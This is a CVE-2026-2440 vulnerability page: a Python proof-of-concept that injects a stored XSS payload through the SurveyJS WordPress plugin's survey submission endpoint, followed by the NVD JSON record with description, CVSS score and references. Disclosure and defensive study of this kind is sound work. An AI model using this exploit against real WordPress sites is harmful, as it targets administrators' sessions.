CVE-2026-2440

import requests # Target URL of the vulnerable survey submission endpoint target_url = "http://target-wordpress-site/wp-content/plugins/surveyjs/ajax_handlers/save_result.php" # Extract the nonce from the public survey page source # In a real scenario, scrape the page to find the nonce value in the HTML nonce = "EXTRACTED_NONCE_VALUE_FROM_PAGE" # Malicious payload: HTML encoded image tag triggering XSS # The payload is submitted as a survey result payload = '<img src=x onerror=alert(1)>' # Construct the POST data data = { "action": "save_result", "nonce": nonce, "survey_result": payload # Injecting into the vulnerable field } # Send the request to store the payload response = requests.post(target_url, data=data) if response.status_code == 200: print("[+] Payload submitted successfully.") print("[+] Trigger: Wait for an administrator to view the survey results.") else: print("[-] Failed to submit payload.")

{"cve": {"id": "CVE-2026-2440", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:02.220", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SurveyJS plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.5.3 via survey result submissions. This is due to insufficient input sanitization and output escaping. The public survey page exposes the nonce required for submission, allowing unauthenticated attackers to submit HTML-encoded payloads that are decoded and rendered as executable HTML when an administrator views survey results, leading to stored XSS in the admin context."}, {"lang": "es", "value": "El plugin SurveyJS para WordPress es vulnerable a cross-site scripting almacenado en todas las versiones hasta la 2.5.3, inclusive, a través del envío de resultados de encuestas. Esto se debe a una sanitización de entrada y un escape de salida insuficientes. La página pública de la encuesta expone el nonce requerido para el envío, lo que permite a atacantes no autenticados enviar cargas útiles codificadas en HTML que se decodifican y se renderizan como HTML ejecutable cuando un administrador ve los resultados de la encuesta, lo que lleva a XSS almacenado en el contexto de administrador."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/surveyjs/tags/2.5.2/ajax_handlers/save_result.php#L15", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/surveyjs/tags/2.5.2/views/results.php#L116", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08264ef7-940f-46b6-9880-34d730adad3c?source=cve", "source": "[email protected]"}]}}